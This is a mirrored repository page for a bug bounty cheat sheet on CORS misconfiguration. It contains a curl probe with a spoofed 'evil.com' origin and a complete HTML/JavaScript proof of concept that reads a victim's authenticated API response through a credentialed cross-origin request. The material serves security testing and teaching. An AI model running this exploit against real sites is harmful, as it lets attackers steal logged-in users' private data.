Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-22 11:03:14 +00:00
Code Issues Projects Releases Packages Wiki Activity
bugbounty-cheatsheet/cheatsheets/cors.md
sxcurity a208ba5d18 Create cors.md 
We should create a CORS cheatsheet. Will add more in the future.
2017-10-25 10:53:04 -05:00

1,022 B
Raw Blame History

Cross Origin Resource Sharing (CORS)

Testing: curl --head -s 'http://example.com/api/v1/secret' -H 'Origin: http://evil.com'

Check to see what the server responds with in the Access-Control-Allow-Origin: (if anything) and if so, check if Access-Control-Allow-Credentials: true is present.

If it is trusting arbitrary origins with allow-credentials set to true, then host this HTML as a proof of concept.

<!DOCTYPE html>
<html>
<head><title>BugBounty CheatSheet</title></head>
<body>
<center>
<h2>CORs POC</h2>

<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("pwnz").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://example.com/api/v1/topsecret", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>